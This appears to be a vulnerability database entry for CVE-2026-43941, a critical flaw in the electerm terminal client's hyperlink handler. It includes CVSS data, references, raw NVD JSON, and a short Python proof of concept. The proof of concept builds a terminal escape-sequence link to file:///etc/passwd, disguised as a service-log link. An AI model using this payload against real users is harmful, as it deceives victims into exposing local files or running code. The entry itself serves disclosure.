CVE-2026-43941

Description

electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. In versions 3.8.15 and prior, Electerm's terminal hyperlink handler passes any URL clicked in the terminal directly to shell.openExternal without any protocol validation. An attacker who controls terminal output (e.g., via a malicious SSH server, compromised remote host, or malicious plugin rendering terminal content) can thus achieve arbitrary code execution or local file access on the victim's machine, requiring only that the victim clicks a displayed link. At time of publication, there are no publicly available patches.

CVSS Details

CVSS Score

9.6

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:electerm_project:electerm:*:*:*:*:*:*:*:* - VULNERABLE

electerm <= 3.8.15

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import sys

# Conceptual PoC for CVE-2026-43941
# This script generates a malicious terminal output hyperlink.
# If a user clicks this link in a vulnerable Electerm version,
# it will attempt to open the local password file.

malicious_url = "file:///etc/passwd"

# ANSI escape sequence for hyperlinks in terminal
# Format: \033]8;;URL\033\\Text\033]8;;\033\\
payload = f"\033]8;;{malicious_url}\033\\[SYSTEM] Click here to view service logs\033]8;;\033\\"

print("Malicious output to be sent to terminal:")
print(payload)
print("\nIf clicked, Electerm will execute: shell.openExternal('file:///etc/passwd')")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-43941
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-43941
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-43941/
[4] VulDB https://vuldb.com/cve/CVE-2026-43941
[5] https://github.com/electerm/electerm/security/advisories/GHSA-fwf6-j56g-m97c

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-43941", "sourceIdentifier": "[email protected]", "published": "2026-05-08T04:16:23.260", "lastModified": "2026-05-08T19:17:30.757", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. In versions 3.8.15 and prior, Electerm's terminal hyperlink handler passes any URL clicked in the terminal directly to shell.openExternal without any protocol validation. An attacker who controls terminal output (e.g., via a malicious SSH server, compromised remote host, or malicious plugin rendering terminal content) can thus achieve arbitrary code execution or local file access on the victim's machine, requiring only that the victim clicks a displayed link. At time of publication, there are no publicly available patches."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-88"}, {"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:electerm_project:electerm:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.8.15", "matchCriteriaId": "F236D6E0-CA4E-4FDB-AC8A-4AA1314FE5A7"}]}]}], "references": [{"url": "https://github.com/electerm/electerm/security/advisories/GHSA-fwf6-j56g-m97c", "source": "[email protected]", "tags": ["Vendor Advisory", "Mitigation"]}]}}